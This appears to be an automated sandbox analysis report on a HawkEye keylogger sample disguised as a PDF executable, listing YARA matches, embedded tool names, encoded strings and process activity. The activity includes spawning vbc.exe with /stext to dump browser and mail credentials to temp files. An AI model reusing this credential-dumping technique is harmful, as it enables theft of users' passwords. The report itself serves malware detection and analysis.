              Source: 2.2.5O857649056366403032021.PDF.exe.45fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 2.2.5O857649056366403032021.PDF.exe.45fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 2.2.5O857649056366403032021.PDF.exe.409c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 2.2.5O857649056366403032021.PDF.exe.409c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.5O857649056366403032021.PDF.exe.3a73b90.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.5O857649056366403032021.PDF.exe.3a73b90.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.5O857649056366403032021.PDF.exe.387bbb0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
              Source: 0.2.5O857649056366403032021.PDF.exe.387bbb0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Source: 2.2.5O857649056366403032021.PDF.exe.31cb310.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: 5O857649056366403032021.PDF.exe
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess Stats: CPU usage > 98%
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 0_2_0267E3300_2_0267E330
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 0_2_0267C6900_2_0267C690
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 0_2_02679D780_2_02679D78
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 2_2_0151B29C2_2_0151B29C
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 2_2_0151C3102_2_0151C310
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 2_2_0151B2902_2_0151B290
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 2_2_015199D02_2_015199D0
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 2_2_0151DFD02_2_0151DFD0
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 2_2_073DB4E02_2_073DB4E0
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 2_2_073DEEC82_2_073DEEC8
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 2_2_073DBDB02_2_073DBDB0
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 2_2_073DB1982_2_073DB198
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeCode function: 2_2_073D00062_2_073D0006
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004044197_2_00404419
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004045167_2_00404516
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004135387_2_00413538
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004145A17_2_004145A1
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0040E6397_2_0040E639
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004337AF7_2_004337AF
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_004399B17_2_004399B1
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0043DAE77_2_0043DAE7
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00405CF67_2_00405CF6
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00403F857_2_00403F85
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00411F997_2_00411F99
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00404DDB8_2_00404DDB
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040BD8A8_2_0040BD8A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00404E4C8_2_00404E4C
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00404EBD8_2_00404EBD
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00404F4E8_2_00404F4E
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
              Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 516
              Source: 5O857649056366403032021.PDF.exeBinary or memory string: OriginalFilename vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.223255879.0000000005980000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000000.210356525.0000000000342000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNotSupportedException.exe6 vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exeBinary or memory string: OriginalFilename vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000000.216226088.0000000000CA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNotSupportedException.exe6 vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.768924491.0000000000482000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exeBinary or memory string: OriginalFilenameNotSupportedException.exe6 vs 5O857649056366403032021.PDF.exe
              Source: 5O857649056366403032021.PDF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 00000002.00000002.784876138.0000000008720000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.785047145.0000000008890000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.5O857649056366403032021.PDF.exe.8890000.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.5O857649056366403032021.PDF.exe.8720000.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.5O857649056366403032021.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.5O857649056366403032021.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 2.2.5O857649056366403032021.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.5O857649056366403032021.PDF.exe.45fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 2.2.5O857649056366403032021.PDF.exe.45fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.5O857649056366403032021.PDF.exe.409c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 2.2.5O857649056366403032021.PDF.exe.409c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.5O857649056366403032021.PDF.exe.3a73b90.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.5O857649056366403032021.PDF.exe.3a73b90.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.5O857649056366403032021.PDF.exe.3a73b90.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.5O857649056366403032021.PDF.exe.387bbb0.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.5O857649056366403032021.PDF.exe.387bbb0.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
              Source: 0.2.5O857649056366403032021.PDF.exe.387bbb0.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.5O857649056366403032021.PDF.exe.31cb310.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.5O857649056366403032021.PDF.exe.31cb310.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.5O857649056366403032021.PDF.exe.31def9c.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5O857649056366403032021.PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
              Source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, Form1.csBase64 encoded string: 'xZv2KTjDOGwMPewlL06/2/+cBh+3YNzZLNYqWwxyouAodILYLJV9xZ9CGhDaO0jH', 'G9O9EXxYbTKbu/JIqZ4FXWAEsGCT7RJ+/SHmPiE44HoRMOAUDNTRY4dL0xxXj+PX', 'yFzOCZnSHgqZgbtRiX7zTTL1Qt6D+8cCFAWN8MP9eKKls7OaJo1TF2n4j++JkQX9', 'O6ZQ7J5ocLxf6RhQQpNSk/JzuZPUi9E0JuztOnaE/Qd705fOtAkyZW1GYthg8J6YkNuszS5M9pYlCk2wrogMRg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/7@1/1
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,7_2_00415AFD
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,7_2_00415F87
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,7_2_00411196
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00411EF8 FindResourceW,SizeofResource,LoadResource,LockResource,7_2_00411EF8
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5O857649056366403032021.PDF.exe.logJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6732
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\holdermail.txtJump to behavior
              Source: 5O857649056366403032021.PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exe, 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: 5O857649056366403032021.PDF.exeReversingLabs: Detection: 23%
              Source: unknownProcess created: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe 'C:\Users\user\Desktop\5O857649056366403032021.PDF.exe'
              Source: unknownProcess created: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe C:\Users\user\Desktop\5O857649056366403032021.PDF.exe
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
              Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 516
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess created: C:\Users\user\Desktop\5O857649056366403032021.PDF.exe C:\Users\user\Desktop\5O857649056366403032021.PDF.exeJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: 5O857649056366403032021.PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: 5O857649056366403032021.PDF.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: 5O857649056366403032021.PDF.exeStatic file information: File size 1057280 > 1048576
              Source: 5O857649056366403032021.PDF.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x101800
              Source: 5O857649056366403032021.PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmp
              Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, vbc.exe
